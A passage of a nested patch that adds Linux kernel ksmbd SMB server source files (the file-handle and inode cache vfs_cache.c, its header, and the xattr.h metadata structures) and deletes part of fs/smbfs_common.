++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da);
++int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da);
++int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
++				 struct inode *inode);
++int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
++				struct inode *inode,
++				struct inode *parent_inode);
++#endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+new file mode 100644
+index 0000000000000..0ae5dd0829e92
+--- /dev/null
++++ b/fs/smb/server/vfs_cache.c
+@@ -0,0 +1,708 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ * Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/vmalloc.h>
++
++#include "glob.h"
++#include "vfs_cache.h"
++#include "oplock.h"
++#include "vfs.h"
++#include "connection.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "smb_common.h"
++
++#define S_DEL_PENDING			1
++#define S_DEL_ON_CLS			2
++#define S_DEL_ON_CLS_STREAM		8
++
++static unsigned int inode_hash_mask __read_mostly;
++static unsigned int inode_hash_shift __read_mostly;
++static struct hlist_head *inode_hashtable __read_mostly;
++static DEFINE_RWLOCK(inode_hash_lock);
++
++static struct ksmbd_file_table global_ft;
++static atomic_long_t fd_limit;
++static struct kmem_cache *filp_cache;
++
++void ksmbd_set_fd_limit(unsigned long limit)
++{
++	limit = min(limit, get_max_files());
++	atomic_long_set(&fd_limit, limit);
++}
++
++static bool fd_limit_depleted(void)
++{
++	long v = atomic_long_dec_return(&fd_limit);
++
++	if (v >= 0)
++		return false;
++	atomic_long_inc(&fd_limit);
++	return true;
++}
++
++static void fd_limit_close(void)
++{
++	atomic_long_inc(&fd_limit);
++}
++
++/*
++ * INODE hash
++ */
++
++static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
++{
++	unsigned long tmp;
++
++	tmp = (hashval * (unsigned long)sb) ^ (GOLDEN_RATIO_PRIME + hashval) /
++		L1_CACHE_BYTES;
++	tmp = tmp ^ ((tmp ^ GOLDEN_RATIO_PRIME) >> inode_hash_shift);
++	return tmp & inode_hash_mask;
++}
++
++static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
++{
++	struct hlist_head *head = inode_hashtable +
++		inode_hash(inode->i_sb, inode->i_ino);
++	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
++
++	hlist_for_each_entry(ci, head, m_hash) {
++		if (ci->m_inode == inode) {
++			if (atomic_inc_not_zero(&ci->m_count))
++				ret_ci = ci;
++			break;
++		}
++	}
++	return ret_ci;
++}
++
++static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
++{
++	return __ksmbd_inode_lookup(file_inode(fp->filp));
++}
++
++static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
++{
++	struct ksmbd_inode *ci;
++
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(inode);
++	read_unlock(&inode_hash_lock);
++	return ci;
++}
++
++int ksmbd_query_inode_status(struct inode *inode)
++{
++	struct ksmbd_inode *ci;
++	int ret = KSMBD_INODE_STATUS_UNKNOWN;
++
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(inode);
++	if (ci) {
++		ret = KSMBD_INODE_STATUS_OK;
++		if (ci->m_flags & S_DEL_PENDING)
++			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
++		atomic_dec(&ci->m_count);
++	}
++	read_unlock(&inode_hash_lock);
++	return ret;
++}
++
++bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
++{
++	return (fp->f_ci->m_flags & S_DEL_PENDING);
++}
++
++void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
++{
++	fp->f_ci->m_flags |= S_DEL_PENDING;
++}
++
++void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp)
++{
++	fp->f_ci->m_flags &= ~S_DEL_PENDING;
++}
++
++void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
++				  int file_info)
++{
++	if (ksmbd_stream_fd(fp)) {
++		fp->f_ci->m_flags |= S_DEL_ON_CLS_STREAM;
++		return;
++	}
++
++	fp->f_ci->m_flags |= S_DEL_ON_CLS;
++}
++
++static void ksmbd_inode_hash(struct ksmbd_inode *ci)
++{
++	struct hlist_head *b = inode_hashtable +
++		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
++
++	hlist_add_head(&ci->m_hash, b);
++}
++
++static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
++{
++	write_lock(&inode_hash_lock);
++	hlist_del_init(&ci->m_hash);
++	write_unlock(&inode_hash_lock);
++}
++
++static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
++{
++	ci->m_inode = file_inode(fp->filp);
++	atomic_set(&ci->m_count, 1);
++	atomic_set(&ci->op_count, 0);
++	atomic_set(&ci->sop_count, 0);
++	ci->m_flags = 0;
++	ci->m_fattr = 0;
++	INIT_LIST_HEAD(&ci->m_fp_list);
++	INIT_LIST_HEAD(&ci->m_op_list);
++	rwlock_init(&ci->m_lock);
++	return 0;
++}
++
++static struct ksmbd_inode *ksmbd_inode_get(struct ksmbd_file *fp)
++{
++	struct ksmbd_inode *ci, *tmpci;
++	int rc;
++
++	read_lock(&inode_hash_lock);
++	ci = ksmbd_inode_lookup(fp);
++	read_unlock(&inode_hash_lock);
++	if (ci)
++		return ci;
++
++	ci = kmalloc(sizeof(struct ksmbd_inode), GFP_KERNEL);
++	if (!ci)
++		return NULL;
++
++	rc = ksmbd_inode_init(ci, fp);
++	if (rc) {
++		pr_err("inode initialized failed\n");
++		kfree(ci);
++		return NULL;
++	}
++
++	write_lock(&inode_hash_lock);
++	tmpci = ksmbd_inode_lookup(fp);
++	if (!tmpci) {
++		ksmbd_inode_hash(ci);
++	} else {
++		kfree(ci);
++		ci = tmpci;
++	}
++	write_unlock(&inode_hash_lock);
++	return ci;
++}
++
++static void ksmbd_inode_free(struct ksmbd_inode *ci)
++{
++	ksmbd_inode_unhash(ci);
++	kfree(ci);
++}
++
++static void ksmbd_inode_put(struct ksmbd_inode *ci)
++{
++	if (atomic_dec_and_test(&ci->m_count))
++		ksmbd_inode_free(ci);
++}
++
++int __init ksmbd_inode_hash_init(void)
++{
++	unsigned int loop;
++	unsigned long numentries = 16384;
++	unsigned long bucketsize = sizeof(struct hlist_head);
++	unsigned long size;
++
++	inode_hash_shift = ilog2(numentries);
++	inode_hash_mask = (1 << inode_hash_shift) - 1;
++
++	size = bucketsize << inode_hash_shift;
++
++	/* init master fp hash table */
++	inode_hashtable = vmalloc(size);
++	if (!inode_hashtable)
++		return -ENOMEM;
++
++	for (loop = 0; loop < (1U << inode_hash_shift); loop++)
++		INIT_HLIST_HEAD(&inode_hashtable[loop]);
++	return 0;
++}
++
++void ksmbd_release_inode_hash(void)
++{
++	vfree(inode_hashtable);
++}
++
++static void __ksmbd_inode_close(struct ksmbd_file *fp)
++{
++	struct dentry *dir, *dentry;
++	struct ksmbd_inode *ci = fp->f_ci;
++	int err;
++	struct file *filp;
++
++	filp = fp->filp;
++	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
++		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
++		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
++					     filp->f_path.dentry,
++					     fp->stream.name);
++		if (err)
++			pr_err("remove xattr failed : %s\n",
++			       fp->stream.name);
++	}
++
++	if (atomic_dec_and_test(&ci->m_count)) {
++		write_lock(&ci->m_lock);
++		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
++			dentry = filp->f_path.dentry;
++			dir = dentry->d_parent;
++			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
++			write_unlock(&ci->m_lock);
++			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
++			write_lock(&ci->m_lock);
++		}
++		write_unlock(&ci->m_lock);
++
++		ksmbd_inode_free(ci);
++	}
++}
++
++static void __ksmbd_remove_durable_fd(struct ksmbd_file *fp)
++{
++	if (!has_file_id(fp->persistent_id))
++		return;
++
++	write_lock(&global_ft.lock);
++	idr_remove(global_ft.idr, fp->persistent_id);
++	write_unlock(&global_ft.lock);
++}
++
++static void __ksmbd_remove_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
++{
++	if (!has_file_id(fp->volatile_id))
++		return;
++
++	write_lock(&fp->f_ci->m_lock);
++	list_del_init(&fp->node);
++	write_unlock(&fp->f_ci->m_lock);
++
++	write_lock(&ft->lock);
++	idr_remove(ft->idr, fp->volatile_id);
++	write_unlock(&ft->lock);
++}
++
++static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
++{
++	struct file *filp;
++	struct ksmbd_lock *smb_lock, *tmp_lock;
++
++	fd_limit_close();
++	__ksmbd_remove_durable_fd(fp);
++	__ksmbd_remove_fd(ft, fp);
++
++	close_id_del_oplock(fp);
++	filp = fp->filp;
++
++	__ksmbd_inode_close(fp);
++	if (!IS_ERR_OR_NULL(filp))
++		fput(filp);
++
++	/* because the reference count of fp is 0, it is guaranteed that
++	 * there are not accesses to fp->lock_list.
++	 */
++	list_for_each_entry_safe(smb_lock, tmp_lock, &fp->lock_list, flist) {
++		spin_lock(&fp->conn->llist_lock);
++		list_del(&smb_lock->clist);
++		spin_unlock(&fp->conn->llist_lock);
++
++		list_del(&smb_lock->flist);
++		locks_free_lock(smb_lock->fl);
++		kfree(smb_lock);
++	}
++
++	if (ksmbd_stream_fd(fp))
++		kfree(fp->stream.name);
++	kmem_cache_free(filp_cache, fp);
++}
++
++static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
++{
++	if (!atomic_inc_not_zero(&fp->refcount))
++		return NULL;
++	return fp;
++}
++
++static struct ksmbd_file *__ksmbd_lookup_fd(struct ksmbd_file_table *ft,
++					    u64 id)
++{
++	struct ksmbd_file *fp;
++
++	if (!has_file_id(id))
++		return NULL;
++
++	read_lock(&ft->lock);
++	fp = idr_find(ft->idr, id);
++	if (fp)
++		fp = ksmbd_fp_get(fp);
++	read_unlock(&ft->lock);
++	return fp;
++}
++
++static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	__ksmbd_close_fd(&work->sess->file_table, fp);
++	atomic_dec(&work->conn->stats.open_files_count);
++}
++
++static void set_close_state_blocked_works(struct ksmbd_file *fp)
++{
++	struct ksmbd_work *cancel_work;
++
++	spin_lock(&fp->f_lock);
++	list_for_each_entry(cancel_work, &fp->blocked_works,
++				 fp_entry) {
++		cancel_work->state = KSMBD_WORK_CLOSED;
++		cancel_work->cancel_fn(cancel_work->cancel_argv);
++	}
++	spin_unlock(&fp->f_lock);
++}
++
++int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
++{
++	struct ksmbd_file	*fp;
++	struct ksmbd_file_table	*ft;
++
++	if (!has_file_id(id))
++		return 0;
++
++	ft = &work->sess->file_table;
++	read_lock(&ft->lock);
++	fp = idr_find(ft->idr, id);
++	if (fp) {
++		set_close_state_blocked_works(fp);
++
++		if (!atomic_dec_and_test(&fp->refcount))
++			fp = NULL;
++	}
++	read_unlock(&ft->lock);
++
++	if (!fp)
++		return -EINVAL;
++
++	__put_fd_final(work, fp);
++	return 0;
++}
++
++void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	if (!fp)
++		return;
++
++	if (!atomic_dec_and_test(&fp->refcount))
++		return;
++	__put_fd_final(work, fp);
++}
++
++static bool __sanity_check(struct ksmbd_tree_connect *tcon, struct ksmbd_file *fp)
++{
++	if (!fp)
++		return false;
++	if (fp->tcon != tcon)
++		return false;
++	return true;
++}
++
++struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id)
++{
++	return __ksmbd_lookup_fd(&work->sess->file_table, id);
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id)
++{
++	struct ksmbd_file *fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
++
++	if (__sanity_check(work->tcon, fp))
++		return fp;
++
++	ksmbd_fd_put(work, fp);
++	return NULL;
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
++					u64 pid)
++{
++	struct ksmbd_file *fp;
++
++	if (!has_file_id(id)) {
++		id = work->compound_fid;
++		pid = work->compound_pfid;
++	}
++
++	fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
++	if (!__sanity_check(work->tcon, fp)) {
++		ksmbd_fd_put(work, fp);
++		return NULL;
++	}
++	if (fp->persistent_id != pid) {
++		ksmbd_fd_put(work, fp);
++		return NULL;
++	}
++	return fp;
++}
++
++struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id)
++{
++	return __ksmbd_lookup_fd(&global_ft, id);
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
++{
++	struct ksmbd_file	*fp = NULL;
++	unsigned int		id;
++
++	read_lock(&global_ft.lock);
++	idr_for_each_entry(global_ft.idr, fp, id) {
++		if (!memcmp(fp->create_guid,
++			    cguid,
++			    SMB2_CREATE_GUID_SIZE)) {
++			fp = ksmbd_fp_get(fp);
++			break;
++		}
++	}
++	read_unlock(&global_ft.lock);
++
++	return fp;
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
++{
++	struct ksmbd_file	*lfp;
++	struct ksmbd_inode	*ci;
++
++	ci = ksmbd_inode_lookup_by_vfsinode(inode);
++	if (!ci)
++		return NULL;
++
++	read_lock(&ci->m_lock);
++	list_for_each_entry(lfp, &ci->m_fp_list, node) {
++		if (inode == file_inode(lfp->filp)) {
++			atomic_dec(&ci->m_count);
++			lfp = ksmbd_fp_get(lfp);
++			read_unlock(&ci->m_lock);
++			return lfp;
++		}
++	}
++	atomic_dec(&ci->m_count);
++	read_unlock(&ci->m_lock);
++	return NULL;
++}
++
++#define OPEN_ID_TYPE_VOLATILE_ID	(0)
++#define OPEN_ID_TYPE_PERSISTENT_ID	(1)
++
++static void __open_id_set(struct ksmbd_file *fp, u64 id, int type)
++{
++	if (type == OPEN_ID_TYPE_VOLATILE_ID)
++		fp->volatile_id = id;
++	if (type == OPEN_ID_TYPE_PERSISTENT_ID)
++		fp->persistent_id = id;
++}
++
++static int __open_id(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++		     int type)
++{
++	u64			id = 0;
++	int			ret;
++
++	if (type == OPEN_ID_TYPE_VOLATILE_ID && fd_limit_depleted()) {
++		__open_id_set(fp, KSMBD_NO_FID, type);
++		return -EMFILE;
++	}
++
++	idr_preload(GFP_KERNEL);
++	write_lock(&ft->lock);
++	ret = idr_alloc_cyclic(ft->idr, fp, 0, INT_MAX - 1, GFP_NOWAIT);
++	if (ret >= 0) {
++		id = ret;
++		ret = 0;
++	} else {
++		id = KSMBD_NO_FID;
++		fd_limit_close();
++	}
++
++	__open_id_set(fp, id, type);
++	write_unlock(&ft->lock);
++	idr_preload_end();
++	return ret;
++}
++
++unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp)
++{
++	__open_id(&global_ft, fp, OPEN_ID_TYPE_PERSISTENT_ID);
++	return fp->persistent_id;
++}
++
++struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
++{
++	struct ksmbd_file *fp;
++	int ret;
++
++	fp = kmem_cache_zalloc(filp_cache, GFP_KERNEL);
++	if (!fp) {
++		pr_err("Failed to allocate memory\n");
++		return ERR_PTR(-ENOMEM);
++	}
++
++	INIT_LIST_HEAD(&fp->blocked_works);
++	INIT_LIST_HEAD(&fp->node);
++	INIT_LIST_HEAD(&fp->lock_list);
++	spin_lock_init(&fp->f_lock);
++	atomic_set(&fp->refcount, 1);
++
++	fp->filp		= filp;
++	fp->conn		= work->conn;
++	fp->tcon		= work->tcon;
++	fp->volatile_id		= KSMBD_NO_FID;
++	fp->persistent_id	= KSMBD_NO_FID;
++	fp->f_ci		= ksmbd_inode_get(fp);
++
++	if (!fp->f_ci) {
++		ret = -ENOMEM;
++		goto err_out;
++	}
++
++	ret = __open_id(&work->sess->file_table, fp, OPEN_ID_TYPE_VOLATILE_ID);
++	if (ret) {
++		ksmbd_inode_put(fp->f_ci);
++		goto err_out;
++	}
++
++	atomic_inc(&work->conn->stats.open_files_count);
++	return fp;
++
++err_out:
++	kmem_cache_free(filp_cache, fp);
++	return ERR_PTR(ret);
++}
++
++static int
++__close_file_table_ids(struct ksmbd_file_table *ft,
++		       struct ksmbd_tree_connect *tcon,
++		       bool (*skip)(struct ksmbd_tree_connect *tcon,
++				    struct ksmbd_file *fp))
++{
++	unsigned int			id;
++	struct ksmbd_file		*fp;
++	int				num = 0;
++
++	idr_for_each_entry(ft->idr, fp, id) {
++		if (skip(tcon, fp))
++			continue;
++
++		set_close_state_blocked_works(fp);
++
++		if (!atomic_dec_and_test(&fp->refcount))
++			continue;
++		__ksmbd_close_fd(ft, fp);
++		num++;
++	}
++	return num;
++}
++
++static bool tree_conn_fd_check(struct ksmbd_tree_connect *tcon,
++			       struct ksmbd_file *fp)
++{
++	return fp->tcon != tcon;
++}
++
++static bool session_fd_check(struct ksmbd_tree_connect *tcon,
++			     struct ksmbd_file *fp)
++{
++	return false;
++}
++
++void ksmbd_close_tree_conn_fds(struct ksmbd_work *work)
++{
++	int num = __close_file_table_ids(&work->sess->file_table,
++					 work->tcon,
++					 tree_conn_fd_check);
++
++	atomic_sub(num, &work->conn->stats.open_files_count);
++}
++
++void ksmbd_close_session_fds(struct ksmbd_work *work)
++{
++	int num = __close_file_table_ids(&work->sess->file_table,
++					 work->tcon,
++					 session_fd_check);
++
++	atomic_sub(num, &work->conn->stats.open_files_count);
++}
++
++int ksmbd_init_global_file_table(void)
++{
++	return ksmbd_init_file_table(&global_ft);
++}
++
++void ksmbd_free_global_file_table(void)
++{
++	struct ksmbd_file	*fp = NULL;
++	unsigned int		id;
++
++	idr_for_each_entry(global_ft.idr, fp, id) {
++		__ksmbd_remove_durable_fd(fp);
++		kmem_cache_free(filp_cache, fp);
++	}
++
++	ksmbd_destroy_file_table(&global_ft);
++}
++
++int ksmbd_init_file_table(struct ksmbd_file_table *ft)
++{
++	ft->idr = kzalloc(sizeof(struct idr), GFP_KERNEL);
++	if (!ft->idr)
++		return -ENOMEM;
++
++	idr_init(ft->idr);
++	rwlock_init(&ft->lock);
++	return 0;
++}
++
++void ksmbd_destroy_file_table(struct ksmbd_file_table *ft)
++{
++	if (!ft->idr)
++		return;
++
++	__close_file_table_ids(ft, NULL, session_fd_check);
++	idr_destroy(ft->idr);
++	kfree(ft->idr);
++	ft->idr = NULL;
++}
++
++int ksmbd_init_file_cache(void)
++{
++	filp_cache = kmem_cache_create("ksmbd_file_cache",
++				       sizeof(struct ksmbd_file), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!filp_cache)
++		goto out;
++
++	return 0;
++
++out:
++	pr_err("failed to allocate file cache\n");
++	return -ENOMEM;
++}
++
++void ksmbd_exit_file_cache(void)
++{
++	kmem_cache_destroy(filp_cache);
++}
+diff --git a/fs/smb/server/vfs_cache.h b/fs/smb/server/vfs_cache.h
+new file mode 100644
+index 0000000000000..fcb13413fa8d9
+--- /dev/null
++++ b/fs/smb/server/vfs_cache.h
+@@ -0,0 +1,166 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __VFS_CACHE_H__
++#define __VFS_CACHE_H__
++
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/rwsem.h>
++#include <linux/spinlock.h>
++#include <linux/idr.h>
++#include <linux/workqueue.h>
++
++#include "vfs.h"
++
++/* Windows style file permissions for extended response */
++#define	FILE_GENERIC_ALL	0x1F01FF
++#define	FILE_GENERIC_READ	0x120089
++#define	FILE_GENERIC_WRITE	0x120116
++#define	FILE_GENERIC_EXECUTE	0X1200a0
++
++#define KSMBD_START_FID		0
++#define KSMBD_NO_FID		(INT_MAX)
++#define SMB2_NO_FID		(0xFFFFFFFFFFFFFFFFULL)
++
++struct ksmbd_conn;
++struct ksmbd_session;
++
++struct ksmbd_lock {
++	struct file_lock *fl;
++	struct list_head clist;
++	struct list_head flist;
++	struct list_head llist;
++	unsigned int flags;
++	int cmd;
++	int zero_len;
++	unsigned long long start;
++	unsigned long long end;
++};
++
++struct stream {
++	char *name;
++	ssize_t size;
++};
++
++struct ksmbd_inode {
++	rwlock_t			m_lock;
++	atomic_t			m_count;
++	atomic_t			op_count;
++	/* opinfo count for streams */
++	atomic_t			sop_count;
++	struct inode			*m_inode;
++	unsigned int			m_flags;
++	struct hlist_node		m_hash;
++	struct list_head		m_fp_list;
++	struct list_head		m_op_list;
++	struct oplock_info		*m_opinfo;
++	__le32				m_fattr;
++};
++
++struct ksmbd_file {
++	struct file			*filp;
++	u64				persistent_id;
++	u64				volatile_id;
++
++	spinlock_t			f_lock;
++
++	struct ksmbd_inode		*f_ci;
++	struct ksmbd_inode		*f_parent_ci;
++	struct oplock_info __rcu	*f_opinfo;
++	struct ksmbd_conn		*conn;
++	struct ksmbd_tree_connect	*tcon;
++
++	atomic_t			refcount;
++	__le32				daccess;
++	__le32				saccess;
++	__le32				coption;
++	__le32				cdoption;
++	__u64				create_time;
++	__u64				itime;
++
++	bool				is_nt_open;
++	bool				attrib_only;
++
++	char				client_guid[16];
++	char				create_guid[16];
++	char				app_instance_id[16];
++
++	struct stream			stream;
++	struct list_head		node;
++	struct list_head		blocked_works;
++	struct list_head		lock_list;
++
++	int				durable_timeout;
++
++	/* if ls is happening on directory, below is valid*/
++	struct ksmbd_readdir_data	readdir_data;
++	int				dot_dotdot[2];
++};
++
++static inline void set_ctx_actor(struct dir_context *ctx,
++				 filldir_t actor)
++{
++	ctx->actor = actor;
++}
++
++#define KSMBD_NR_OPEN_DEFAULT BITS_PER_LONG
++
++struct ksmbd_file_table {
++	rwlock_t		lock;
++	struct idr		*idr;
++};
++
++static inline bool has_file_id(u64 id)
++{
++	return id < KSMBD_NO_FID;
++}
++
++static inline bool ksmbd_stream_fd(struct ksmbd_file *fp)
++{
++	return fp->stream.name != NULL;
++}
++
++int ksmbd_init_file_table(struct ksmbd_file_table *ft);
++void ksmbd_destroy_file_table(struct ksmbd_file_table *ft);
++int ksmbd_close_fd(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
++struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
++					u64 pid);
++void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
++struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
++unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
++struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
++void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
++void ksmbd_close_session_fds(struct ksmbd_work *work);
++int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
++int ksmbd_init_global_file_table(void);
++void ksmbd_free_global_file_table(void);
++void ksmbd_set_fd_limit(unsigned long limit);
++
++/*
++ * INODE hash
++ */
++int __init ksmbd_inode_hash_init(void);
++void ksmbd_release_inode_hash(void);
++
++enum KSMBD_INODE_STATUS {
++	KSMBD_INODE_STATUS_OK,
++	KSMBD_INODE_STATUS_UNKNOWN,
++	KSMBD_INODE_STATUS_PENDING_DELETE,
++};
++
++int ksmbd_query_inode_status(struct inode *inode);
++bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
++void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
++				  int file_info);
++int ksmbd_init_file_cache(void);
++void ksmbd_exit_file_cache(void);
++#endif /* __VFS_CACHE_H__ */
+diff --git a/fs/smb/server/xattr.h b/fs/smb/server/xattr.h
+new file mode 100644
+index 0000000000000..16499ca5c82d3
+--- /dev/null
++++ b/fs/smb/server/xattr.h
+@@ -0,0 +1,122 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __XATTR_H__
++#define __XATTR_H__
++
++/*
++ * These are on-disk structures to store additional metadata into xattr to
++ * reproduce windows filesystem semantics. And they are encoded with NDR to
++ * compatible with samba's xattr meta format. The compatibility with samba
++ * is important because it can lose the information(file attribute,
++ * creation time, acls) about the existing files when switching between
++ * ksmbd and samba.
++ */
++
++/*
++ * Dos attribute flags used for what variable is valid.
++ */
++enum {
++	XATTR_DOSINFO_ATTRIB		= 0x00000001,
++	XATTR_DOSINFO_EA_SIZE		= 0x00000002,
++	XATTR_DOSINFO_SIZE		= 0x00000004,
++	XATTR_DOSINFO_ALLOC_SIZE	= 0x00000008,
++	XATTR_DOSINFO_CREATE_TIME	= 0x00000010,
++	XATTR_DOSINFO_CHANGE_TIME	= 0x00000020,
++	XATTR_DOSINFO_ITIME		= 0x00000040
++};
++
++/*
++ * Dos attribute structure which is compatible with samba's one.
++ * Storing it into the xattr named "DOSATTRIB" separately from inode
++ * allows ksmbd to faithfully reproduce windows filesystem semantics
++ * on top of a POSIX filesystem.
++ */
++struct xattr_dos_attrib {
++	__u16	version;	/* version 3 or version 4 */
++	__u32	flags;		/* valid flags */
++	__u32	attr;		/* Dos attribute */
++	__u32	ea_size;	/* EA size */
++	__u64	size;
++	__u64	alloc_size;
++	__u64	create_time;	/* File creation time */
++	__u64	change_time;	/* File change time */
++	__u64	itime;		/* Invented/Initial time */
++};
++
++/*
++ * Enumeration is used for computing posix acl hash.
++ */
++enum {
++	SMB_ACL_TAG_INVALID = 0,
++	SMB_ACL_USER,
++	SMB_ACL_USER_OBJ,
++	SMB_ACL_GROUP,
++	SMB_ACL_GROUP_OBJ,
++	SMB_ACL_OTHER,
++	SMB_ACL_MASK
++};
++
++#define SMB_ACL_READ			4
++#define SMB_ACL_WRITE			2
++#define SMB_ACL_EXECUTE			1
++
++struct xattr_acl_entry {
++	int type;
++	uid_t uid;
++	gid_t gid;
++	mode_t perm;
++};
++
++/*
++ * xattr_smb_acl structure is used for computing posix acl hash.
++ */
++struct xattr_smb_acl {
++	int count;
++	int next;
++	struct xattr_acl_entry entries[];
++};
++
++/* 64bytes hash in xattr_ntacl is computed with sha256 */
++#define XATTR_SD_HASH_TYPE_SHA256	0x1
++#define XATTR_SD_HASH_SIZE		64
++
++/*
++ * xattr_ntacl is used for storing ntacl and hashes.
++ * Hash is used for checking valid posix acl and ntacl in xattr.
++ */
++struct xattr_ntacl {
++	__u16	version; /* version 4*/
++	void	*sd_buf;
++	__u32	sd_size;
++	__u16	hash_type; /* hash type */
++	__u8	desc[10]; /* posix_acl description */
++	__u16	desc_len;
++	__u64	current_time;
++	__u8	hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for ntacl */
++	__u8	posix_acl_hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for posix acl */
++};
++
++/* DOS ATTRIBUITE XATTR PREFIX */
++#define DOS_ATTRIBUTE_PREFIX		"DOSATTRIB"
++#define DOS_ATTRIBUTE_PREFIX_LEN	(sizeof(DOS_ATTRIBUTE_PREFIX) - 1)
++#define XATTR_NAME_DOS_ATTRIBUTE	(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX)
++#define XATTR_NAME_DOS_ATTRIBUTE_LEN	\
++		(sizeof(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX) - 1)
++
++/* STREAM XATTR PREFIX */
++#define STREAM_PREFIX			"DosStream."
++#define STREAM_PREFIX_LEN		(sizeof(STREAM_PREFIX) - 1)
++#define XATTR_NAME_STREAM		(XATTR_USER_PREFIX STREAM_PREFIX)
++#define XATTR_NAME_STREAM_LEN		(sizeof(XATTR_NAME_STREAM) - 1)
++
++/* SECURITY DESCRIPTOR(NTACL) XATTR PREFIX */
++#define SD_PREFIX			"NTACL"
++#define SD_PREFIX_LEN	(sizeof(SD_PREFIX) - 1)
++#define XATTR_NAME_SD	(XATTR_SECURITY_PREFIX SD_PREFIX)
++#define XATTR_NAME_SD_LEN	\
++		(sizeof(XATTR_SECURITY_PREFIX SD_PREFIX) - 1)
++
++#endif /* __XATTR_H__ */
+diff --git a/fs/smbfs_common/Makefile b/fs/smbfs_common/Makefile
+deleted file mode 100644
+index cafc61a3bfc37..0000000000000
+--- a/fs/smbfs_common/Makefile
++++ /dev/null
+@@ -1,7 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-only
+-#
+-# Makefile for Linux filesystem routines that are shared by client and server.
+-#
+-
+-obj-$(CONFIG_SMBFS_COMMON) += cifs_arc4.o
+-obj-$(CONFIG_SMBFS_COMMON) += cifs_md4.o
+diff --git a/fs/smbfs_common/arc4.h b/fs/smbfs_common/arc4.h
+deleted file mode 100644
+index 12e71ec033a18..0000000000000
+--- a/fs/smbfs_common/arc4.h
++++ /dev/null
